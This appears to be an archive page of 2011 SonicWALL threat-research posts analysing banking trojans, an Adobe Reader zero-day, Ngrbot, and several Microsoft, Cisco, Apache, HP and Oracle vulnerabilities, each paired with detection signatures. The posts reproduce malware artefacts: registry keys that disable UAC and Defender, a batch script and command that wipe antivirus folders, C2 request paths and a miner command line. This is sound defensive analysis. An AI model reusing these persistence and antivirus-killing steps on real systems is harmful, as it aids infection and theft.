Posts

Banker.WXS infects bootloader and steals banking data (Dec 15, 2011)

/in /by

SonicWALL UTM Research team received reports of a new Banking trojan in the wild. This Banking trojan infects the Windows NT system’s NTLDR bootloader, the file that runs before the computer’s operating system. It also steals banking data and target files related to GBPlugin, a browser security plug-in used mostly by Brazilian Banks.

Source of this Trojan have been linked to spam email containing download links.

Once the user downloads and executes the trojan, it will do the following activities:

Downloads the file wxp.zip that contains the following:

  • xp-msantivirus
  • xp-msclean
  • ntldrv2
  • menu.lst
  • clean.bat

Makes a backup of systems ntldr as ntldr.old and replaces the original ntldr with ntldrv2 file.
The new ntldr file is a modified GRUB bootloader that runs the file menu.lst

The menu.lst is responsible for calling the files xp-msantivirus and xp-msclean during system’s reboot. These two files will later on remove files related to GBPlugin and other security softwares.

Files Created:

  • {Computer Name}12k12v3r1.exe – copy of banker trojan

Added Registry:

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun {Computer Name} “Application Data{Computer Name}12k12v3r1.exe”
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced EnableBalloonTips dword:00000000
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZoneMapEscDomains

    • Disables User Account Controls notification by adding the following entries:

  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity Center UacDisableNotify dword:00000001
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem EnableLUA dword:00000000

    • Disables Windows Defender by replacing the data pointing to the file:

  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun Windows Defender VTNC

Deleted Registry:

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZoneMapDomains @ “”
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZoneMapRanges @ “”
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionInternet SettingsZoneMapDomains @ “”
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionInternet SettingsZoneMapRanges @ “”

After the installation, the system will be forced to reboot:

    screenshot

    Translation: “Windows Update is restarting your computer to install the critical security updates”

    screenshot
    Translation: 

     Please wait while the operation is performed. Don't turn off or restart your computer.  ATTENTION: files were found infected with viruses on your computer .. Starting the process of removing viruses: Process started ... This process may take a while depending on the amount of virus-infected files found. Do not turn off or restart your computer during this process, wait for its completion,  your computer will be restarted automatically. Process completed successfully ... Restarting the computer.

    screenshot

    Translation: Booting Iniciando a Ferramenta de Remocao de Software Mal Intencionado da Microsoft

    screenshot

    Translation: 

     Removal Tool Malicious Software  Do not turn off or unplug the machine until the completion of this process

During the system's reboot, the trojan removes the browser security plug-in GBPlugin and other security software that opens up the computer system for other malicious software. It tries to connect to other URLs to possibly download other malware. It also cleans up its track by deleting originally downloaded files.

Network Activity:

  • Remote Server: 50.1{REMOVED}59/.RECURSOS/

    • DNS Query:

  • smartp{REMOVED}yhoster.com
  • multip{REMOVED}omeze.com
  • arowhe{REMOVED}com
  • timbe{REMOVED}com
  • weigot{REMOVED}.com

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

GAV: Banker.WXS (Trojan)

Adobe Reader and Acrobat Zero Day exploit (Dec 9, 2011)

/in /by

SonicWALL UTM Research team found reports of a new zero-day vulnerability (CVE-2011-2462) in Adobe Reader and Acrobat affecting Windows, Mac OS X, and Unix operating systems. This U3D memory corruption vulnerability (CVE-2011-2462) could lead to application crash, and may potentially allow the attacker to gain control of the victim machine. Adobe issued a security advisory on December 6, 2011 warning the users about this flaw.

SonicWALL UTM Research team got hold of a zero-day exploit for this vulnerability in the wild which is a specially crafted PDF file containing malicious encoded JavaScript and malicious U3D object. The exploit may arrive via e-mail or can be served via a malicious drive-by site.

A code snippet from decoded version of JavaScript that performs heap spray and drops a malicious executable file onto the target machine can be seen below:

screenshot

The malicious PDF file when opened performs the following activity on victim machine:

  • Encoded JavaScript uses heap spraying technique to crash the application and redirect to second document page as seen below.

    screenshot

    screenshot

  • It drops a backdoor Trojan on the target machine and runs it:
    • (USER)Local Settingspretty.exe — Detected as GAV: Wisp.A_2 (Trojan)
  • Creates a registry entry to ensure that the backdoor Trojan runs on system reboot:
    • HKCUSoftwareMicrosoftWindowsCurrentVersionRunoffice = “(USER)Local Settingspretty.exe”
  • The dropped backdoor Trojan will further attempt to connect to a remote server prettyli(REMOVED)com and sends following requests:
    • GET /asp/kys_allow_get.asp?s=https&name=getkys.kys&hostname=(HOSTNAME)-(IPADDRESS)-pretty20111122
    • GET /ASP/KYS_ALLOW_PUT.ASP?s=https&TYPE=ptpretty.tmp&hostname=(HOSTNAME)-(IPADDRESS)-pretty20111122

SonicWALL UTM appliance provides protection against this threat via the following signatures:

  • GAV: CVE-2011-2462.A (Exploit)
  • IPS: Malformed PDF File 14b

Microsoft Security Bulletin Coverage (Dec 13, 2011)

/in /by

SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of December, 2011. A list of issues reported, along with SonicWALL coverage information follows:

MS11-087 Vulnerability in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2639417)

  • CVE-2011-3402 TrueType Font Parsing Vulnerability
    GAV: Malformed.ttf.MP.1

MS11-088 Vulnerability in Microsoft Office IME (Chinese) Could Allow Elevation of Privilege (2652016)

  • CVE-2011-2010 Pinyin IME Elevation Vulnerability
    This is a local vulnerability.

MS11-089 Vulnerability in Microsoft Office Could Allow Remote Code Execution (2590602)

  • CVE-2011-1983 Word Use After Free Vulnerability
    GAV: Malformed.doc.MP.4

MS11-090 Cumulative Security Update of ActiveX Kill Bits (2618451)

  • CVE-2011-3397 Microsoft Time Remote Code Execution Vulnerability
    IPS: 7224 – MS IE Time Element Remote Code Execution 1
    IPS: 7225 – MS IE Time Element Remote Code Execution 2

MS11-091 Vulnerabilities in Microsoft Publisher Could Allow Remote Code Execution (2607702)

  • CVE-2011-1508 Publisher Function Pointer Overwrite Vulnerability
    No details available.
  • CVE-2011-3410 Publisher Out-of-bounds Array Index Vulnerability
    IPS: 7226 – Malformed Publisher Document 3b
  • CVE-2011-3411 Publisher Invalid Pointer Vulnerability
    IPS: 7227 – Malformed Publisher Document 4b
  • CVE-2011-3412 Publisher Memory Corruption Vulnerability
    IPS: 7228 – Malformed Publisher Document 5b

MS11-092 Vulnerability in Windows Media Could Allow Remote Code Execution (2648048)

  • CVE-2011-3401 Windows Media Player DVR-MS Memory Corruption Vulnerability
    GAV: MsApp.Exp.MP.2

MS11-093 Vulnerability in OLE Could Allow Remote Code Execution (2624667)

  • CVE-2011-3400 OLE Property Vulnerability
    IPS: 7230 – Malformed Visio Document 4b

MS11-094 Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution (2639142)

  • CVE-2011-3396 PowerPoint Insecure Library Loading Vulnerability
    IPS: 5726 – Possible Binary Planting Attempt 1
    IPS: 1023 – Possible Binary Planting Attempt 2
    IPS: 6847 – Possible Binary Planting Attempt 3
  • CVE-2011-3413 OfficeArt Shape RCE Vulnerability
    GAV: Malformed.ppt.MP.2

MS11-095 Vulnerability in Active Directory Could Allow Remote Code Execution (2640045)

  • CVE-2011-3396 PowerPoint Insecure Library Loading Vulnerability
    It is not possible to distinguish attack from normal traffic.

MS11-096 Vulnerability in Microsoft Excel Could Allow Remote Code Execution (2640241)

  • CVE-2011-3403 Record Memory Corruption Vulnerability
    GAV: Malformed.xls.MP.11

MS11-097 Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege (2620712)

  • CVE-2011-3408 CSRSS Local Privilege Elevation Vulnerability
    This is a local vulnerability.

MS11-098 Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2633171)

  • CVE-2011-2018 Windows Kernel Exception Handler Vulnerability
    This is a local vulnerability.

MS11-099 Cumulative Security Update for Internet Explorer (2618444)

  • CVE-2011-1992 XSS Filter Information Disclosure Vulnerability
    This is a cross domain vulnerability. It is not possible to distinguish attack from normal traffic.
  • CVE-2011-2019 Internet Explorer Insecure Library Loading Vulnerability
    IPS: 5726 – Possible Binary Planting Attempt 1
    IPS: 1023 – Possible Binary Planting Attempt 2
    IPS: 6847 – Possible Binary Planting Attempt 3
  • CVE-2011-3404 Content-Disposition Information Disclosure Vulnerability
    It is not possible to distinguish attack from normal traffic.

Cisco WebEx Player Remote Code Execution (Dec 8, 2011)

/in /by

WebEx Communications Inc. is a Cisco company that provides on-demand collaboration, online meeting, web conferencing and videoconferencing applications. Its products include Meeting Center, Training Center, Event Center, Support Center, Sales Center, MeetMeNow, PCNow, WebEx AIM Pro Business Edition, WebEx WebOffice, WebEx Connect and WebEx Player.

Cisco WebEx uses the proprietary WRF file format (.wrf extension) to store WebEx meeting recordings on the computer of an on-line meeting attendee. The structure of this file is not publicly documented. Reverse-engineering has identified the following structure as a file header: 

 Offset Size Field ----------------------------------------------------- 0x00 4 Magic number = 57 4f 54 46 (WOTF) 0x04 4 Unknown 0x08 4 File size in bytes

After the header, there may be multiple records in the file. The records may have the following format: 

 Offset Size Field -------------------------------------------------------------------------------- 0x00 1 Field Type 0x01 4 Size of the record 0x05 m unknown 0xXX 4 Datasize (n) 0xXX n Data

A code execution vulnerability exists in Cisco WebEx Player ATA32.dll module. The vulnerable code trusts the date form the records of the WRF file, and uses them in determining the size and the offset in a source/destination buffer for a memcpy function call, and then overwrites the memory with the data from the file.

A remote unauthenticated attacker can exploit this vulnerability to inject and execute arbitrary code with the privileges of the currently logged on user. If code execution fails, the vulnerable application will terminate abnormally.

SonicWALL UTM team has researched this vulnerability and released the following IPS signature to detect the attacks based on this vulnerability:

  • 7202 Cisco WebEx Player Remote Code Execution

The vulnerability has been referred by CVE as CVE-2011-4004.

Apache HTTPD mod_proxy Security Bypass (Dec 2, 2011)

/in /by

The Apache HTTP Server, commonly referred to as Apache, is web server software notable for playing a key role in the initial growth of the World Wide Web. In 2009 it became the first web server software to surpass the 100 million website milestone. The server is capable of being utilized with many different options and configurations. A wide variety of runtime loadable plug-in modules can be used to extend its functionality.

One of the official plug-in modules is the mod_proxy module. As all other modules, it can be compiled as a separate shared library with a “.so” extension. The purpose of this module is to let Apache HTTP server run as a forward or reverse proxy for FTP, HTTP, and HTTPS. The proxy functionality can be turned on by its relevant configuration directives. And users would typically send an HTTP request to a web server which will then be forwarded to the appropriate backend servers.

HTTP is a request/response protocol commonly used by HTTP Server. HTTP uses Uniform Resource Identifiers (URIs) to locate the web pages. A typical HTTP request with URI is showed be below:

 GET /test/index.html HTTP/1.1 HOST: www.example.com

A policy bypass vulnerability exists in Apache HTTP server. The vulnerability is due to a design weakness in Apache reverse proxy module mod_proxy when configured in a specific manner. The code may fail to sufficiently sanitize the Request-URI in an HTTP request in this case. As a result, the internal web server which should not be accessible to external users will be accessed through the Reverse Proxy server.

SonicWALL UTM team has researched this vulnerability and released the following IPS sigantures:

  • 3105 Apache HTTPD mod_proxy Security Bypass 1
  • 3132 Apache HTTPD mod_proxy Security Bypass 2

The vulnerability has been referred by CVE as CVE-2011-3368.

Trojan uses Rootkit remover tool to disable Anti-virus (Dec 1, 2011)

/in /by

The Sonicwall UTM research team received reports of a new KillAV Trojan in the wild. This Trojan uses a rootkit remover tool called The Avenger. According to the home page of this tool “The Avenger is a fully-scriptable, kernel-level Windows driver designed to remove highly persistent files, registry keys/values, and other drivers protected by entrenched malware”. Ironically, the Trojan uses this anti malware tool to remove files belonging to a variety of well known anti-virus software from vendors such as AVG, Kaspersky and Symantec. Most anti-virus software protects its files from user-mode removal. However, it is very hard to protect such files from kernel-mode attacks.

The Trojan uses the following icon:

The Trojan adds the following files to the filesystem:

  • C:DRIVERS10KDESCK.exe [Avenger executable]
  • C:DRIVERS10TDESCK.txt [Avenger file instructions]
  • C:WINDOWSsystem32eihs.txt [Avenger file instructions]
  • C:DRIVERS10WINNTK.exe [Detected as GAV: KillFiles.NEK (Trojan)]
  • C:cleanup.exe [Detected as GAV: Zapchast.M (Trojan)]
  • C:cleanup.bat [Cleanup instructions]
  • C:zip.exe [Zip utility]
  • C:WINDOWSsystem32driverstsfqiza.sys [Avenger kernel-mode driver]

TDESCK.txt contains the following information:

      Folders to delete:
      %ProgramFiles%AVG
      %ProgramFiles%Panda Security
      %ProgramFiles%ESET
      %ProgramFiles%KASPER~1
      %ProgramFiles%Avira
      %ProgramFiles%Softwin
      %ProgramFiles%Grisoft
      %ProgramFiles%NORTON~1
      %ProgramFiles%Microsoft Security Client
      Files to move:
      %ProgramFiles%Alwil SoftwareAvast5AvastUI.exe|%ProgramFiles%Alwil SoftwareAvast5AvastUI.exa
      %ProgramFiles%Alwil SoftwareAvast5AvastSvc.exe|%ProgramFiles%Alwil SoftwareAvast5AvastSvc.exa
      %ProgramFiles%AVAST SoftwareAvastAvastSvc.exe|%ProgramFiles%AVAST SoftwareAvastAvastSvc.exa
      %ProgramFiles%AVAST SoftwareAvastAvastUI.exe|%ProgramFiles%AVAST SoftwareAvastAvastUI.exa

The above information instructs the Avenger software to remove or move files and directories belonging to various anti-virus software.

Upon infection, the following command is run to remove the anti-virus files listed above in TDESCK.txt. This command runs Avenger invisibly without its GUI:

      cmd /c C:DRIVERS10KDESCK.exe /nogui C:DRIVERS10TDESCK.txt

cleanup.bat contains the following information:

      @ECHO OFF
      cd %systemdrive%
      if exist %systemdrive%avengerbackup.zip move /y %systemdrive%avengerbackup.zip "%systemdrive%avengerbackup-%date:/=.%-%time::=.%.zip"
      move /y backup.reg %systemdrive%avenger
      copy /y avenger.txt %systemdrive%avenger
      for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do if exist %%a:avenger attrib -r -h -s %%a:avenger* /S /D & zip -r -S -q -m -! -P infected "%systemdrive%avengerbackup.zip" %%a:avenger* -x %systemdrive%avengerbackup*.zip & rmdir %%a:avenger
      del zip.exe
      del cleanup.exe
      del cleanup.bat

The Trojan adds the following keys to the Windows registry to install the Avenger kernel-mode driver and run WINNTK.exe and cleanup.exe after reboot:

  • HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun Microsoft Windows Debug “C:DRIVERS10WINNTK.exe”
  • HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce Cleanup “C:cleanup.exe”
  • HKEY_LOCAL_MACHINESystemCurrentControlSetServicesmmjnbxj ImagePath “C:WINDOWSsystem32driverstsfqiza.sys”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmmjnbxj cvva “C:WINDOWSsystem32eihs.txt”

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: KillFiles.NEK (Trojan)
  • GAV: Zapchast.M (Trojan)

HP Data Protector Information Disclosure (Nov 23, 2011)

/in /by

HP Data Protector Media Operations facilitates tracking and management of storage media, as well as data recovery. It tracks online and offline media such as magnetic tapes. HP Data Protector Media Operations includes an administration GUI which can be installed on multiple hosts allowing several administrators to manage Media Operations.

The communication protocol utilized by the server and its clients is proprietary and not publicly documented. The default communication port for the server is TCP 19813. Messages to the server have have the following structure: 

 Offset	Size(bytes)	Description ------- --------------- ---------------------------------------- 0x0000	1 		Opcode 0x0001	3		unknown 0x0004	4		record size (x) 0x0008	4		unknown 0x000C	x		record data

All multi-byte values are represented in big endian byte order. Several records are usually transferred together in a single packet. Sub records are contained in the record data field of a record structure. Records having an Opcode of 0x03, and a size value greater than four, have the following sub record structure: 

 Offset	Size(bytes)	Description ------- --------------- -------------------------------- 0x0000	4		Opcode 0x0001	1		record size (y) 0x0004	y		filename

Sub records of the above form are possible file requests, which cause the server to return the contents of the file specified in the filename field. The file path resolves relative to the base directory of the server. This base directory is configurable upon product installation. If the record size of a 0x03 record is of a certain specific value, the request is interpreted as a directory listing request, and the contents of the base directory are returned to the client.

An information disclosure vulnerability exists in HP Data Protector, when handling file requests. The process retrieves the filename and appends it to the base directory without any sanitization. As such, directory traversal sequences can be used to traverse to any file on the filesystem. Consequently, the contents of any file will be returned to the client that initiated the file request. A remote, unauthenticated attacker could exploit this vulnerability to obtain confidential information that could be later utilized to compromise other resources.

SonicWALL has released a generic IPS signature to address this issue. The following signature was released:

  • 7175 – HP Data Protector Media Operations Directory Traversal Attempt.

UPS Invoice Notification spam campagin (Nov. 23, 2011)

/in /by

With the coming of holiday season, SonicWALL UTM Research team observed the surge in the online threats. Reports of email spam campaign containing malware attachment pretending to be coming from United Parcel Service (UPS) continue to flood email inboxes.

Computer users are advised to take precaution in opening unsolicited emails especially from unknown sender. UPS also hosted this presentation to raise awareness about UPS related scams.

The behavior of this malware is further discussed below:

Subject: United Parcel Service – Invoice is available [random numbers]

Attachment: UPS-Billing-Invoice-Notification-[random numbers].zip

Message Body:

    UPS Billing Center

    This is an automatically generated email. Please do not reply to this email address.

    Dear UPS Customer,

    A new invoice is now available in the UPS Billing Centre.
    Please refer to attached file for more details

    Please visit the UPS Billing Centre to view and pay your invoice.

    Coming Soon!
    Effective January 2012, the UPS Billing Centre can be accessed using your My UPS ID.
    Current UPS Billing Centre users will be prompted to convert to a My UPS ID. Learn more

    Discover more about UPS:
    Visit ups.com
    Explore UPS Freight Services
    Learn About UPS Companies
    Sign Up For Additional Email From UPS
    Read Compass Online

    (c) 2011 United Parcel Service of America, Inc., the UPS brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
    For more information on UPS’s privacy practices, refer to the UPS Privacy Policy.
    Please do not reply directly to this e-mail. UPS will not receive any reply message.
    For questions or comments, visit Contact UPS.

    This communication contains proprietary information and may be confidential. If you are not the intended recipient, the reading, copying, disclosure or other use of the contents of this e-mail is strictly prohibited and you are instructed to please delete this e-mail immediately.
    Privacy Policy
    Contact UPS

If the user downloads and executes the malicious executable inside the zip attachment, it performs the following activity:

Files Created:

  • Application DataSomonekpos.exe – copy of original malware – blocked as GAV:Kryptik.VUY
  • Application DataAfisaawqide.myx – data file
  • Application DataAfisaawqide.dat – data file

Harvests email addresses:

  • Microsoft Address Book
  • Internet Browser Cookies

Checks for installed client FTP:

  • FlashFXP
  • GhislerTotal Commander
  • ipswitchws_ftp
  • FarPluginsftphosts
  • Far2Pluginsftphosts
  • martin prikrylwinscp 2sessions
  • ftpwarecoreftpsites
  • smartftpclient 2.0settingsgeneralfavorites

Network Activity:

    DNS Request: nos{removed}n.ru

    Post Request: http://nos{removed}n.ru/become.php

Virtual Machine Detection:

    Key: HKLMSystemCurrentControlSetServicesDiskEnum
    Value: 0
    Data:

    • IDEDiskVMware_Virtual_IDE_Hard_Drive
    • IDEDiskVBOX_HARDDISK

VNC Server Detection:

    Tries to connect to VNC server and waits for the following response:

  • RFB 003.003

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

GAV:Kryptik.VUY (Trojan)

Oracle Hyperion ActiveX BO (Nov 18, 2011)

/in /by

Oracle’s Hyperion is composed of various business performance management and business intelligence software. The Hyperion Financial line of products includes financial reporting and analysis components. Installation of Hyperion Financial on Windows systems will result in the installation of several ActiveX controls, one of which is named TTF16.ocx. This ActiveX control is associated with CLSID B0475003-7740-11D1-BDC3-0020AF9F8E6E, and ProgID TTF161.TTF1.6. The control is marked as scriptable, and as such, can be instantiated via a web page by using the tag or through scripting. The following examples demonstrate example instantiation code snippets: 

  Or var ctrl = new ActiveXObject("TTF161.TTF1.6"); 

 The TTF161.TTF1.6 control exposes several methods, one of which is a method named SetDevNames, which is used to set the default printer. An example code snippet illustrating the use of this function is shown:  


SetDevNames('drivername', 'devicename', 'port')


 A code execution vulnerability exists in Oracle’s Hyperion Financial TTF161.TTF1.6 ActiveX control. The vulnerability exists because of a heap buffer overflow during execution of the SetDevNames method. The method allocates a heap buffer of size determined by the number of characters in the given attributes. The method then converts the parameters into Unicode strings which results in doubling of their size. The Unicode strings are then copied into the allocated buffer. If any of the three parameters is not an empty string, a heap buffer overflow will occur.


 In order to exploit this vulnerability, the attacker needs to entice the target user to visit a malicious web page. Any code execution resulting from exploitation will occur in the security context of the currently logged-in user. An unsuccessful code execution attempt may result in abnormal termination of the web browser.


 SonicWALL has released an IPS signature that detects and blocks exploitation attempts targeting this vulnerability. The following signature has been released: 


    

  • 7161 – Oracle Hyperion Strategic TTF16 ActiveX Buffer Overflow
    • 



	Ngrbot steals information and mines Bitcoins (Nov 18, 2011)				
/in  /by 
 SonicWALL UTM Research team discovered Ngrbot spreading in the wild. The bot steals user information and spreads though malicious links, removable drives, instant messengers and social networks. After initial infection, it downloads additional modules including a Bitcoin mining module. Bitcoin is a form of digital currency and one way of obtaining them is by mining. Mining for Bitcoins is a very computationally expensive process involving lots of hashing, making it time consuming and impractical to mine on a personal computer. The creators of this botnet have found a lucrative alternative to generating Bitcoins by leveraging the CPU cycles of infected machines.


 Ngrbot uses misleading filenames with explicit icons as shown below: 


 screenshot


It performs the following activities: 


    

  • It determines geoip details by sending a request to api.wipmania.com.

    • 

  • It contacts a remote C&C server to report infection and receive additional commands.

    • 

  • It downloads additional modules from a remote file hosting server.

    • 

  • It drops the following files:

      

    • %AppData%9.exe [Detected as Injector.KSW_2 (Trojan) ]
      • 

    • %AppData%A.exe	(Corrupted file)
      • 

    • %AppData%kakao3fuckHDZSDP.exe [Detected as Ngrbot.GEN_3 (Worm) ]
      • 

    • %AppData%kakao3 new.exe [Detected as BtcMiner (Trojan) ]
      • 

    • %AppData%Xkagad.exe (Copy of itself) [Detected as Ngrbot.GEN_3 (Worm) ]
      • 

    • Start MenuProgramsStartup newmoon17.exe [Detected as Injector.KSW_3 (Trojan) ]
      • 

    

    • 

     		 		
    

  • It ensures persistence of infection across reboots:

      

    • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun:Xkagad:”%AppData%Xkagad.exe”
      • 

    • Creates startup file in Start MenuProgramsStartup newmoon17.exe
      • 

    

    • 

     		 		
    

  • It has the following information stealing modules:

      

    • popgrab
      • 

    • ftpgrab
      • 

    • ffgrab
      • 

    • iegrab
      • 

    

    • 

      		
    

  • It has the ability to perform DOS(Denial of Service) attacks.

  • It blocks access to various antivirus and security websites by intercepting DNS.

  • It uses form grabbers to steal credentials from the following URL’s:

       			 screenshot
      

    

    • 

  • It has the ability to spread through MSN messenger and removable drives. It also has the ability to post to Bebo, Friendster, Vkontakte, Twitter and Facebook.

  • It attempts to load “nvcuda.dll”(Nvidia CUDA) if present to mine Bitcoins on the GPU(Graphic Processing Unit).

  • It kills all previous Bitcoin mining infections:

       			 screenshot
      

    

    • 

  • It mines for Bitcoins at 59 second intervals by executing the following command:

       			 mine.exe -a 59 -o http://{removed}.org:8332/ -u darksons_crypt -p pt 			
    

    • 

      


  SonicWALL Gateway AntiVirus provides protection against this threat with the following signatures:


    

  • GAV: Ngrbot.GEN (Worm)
    • 

  • GAV: Ngrbot.GEN_3 (Worm)
    • 



 screenshot


 This threat is also classified as “Dorkbot.A (Worm)” by some vendors. 





                
                

                
            

        


						

	


			

			
				


					
		
		
		






				


					

						
Pin It on Pinterest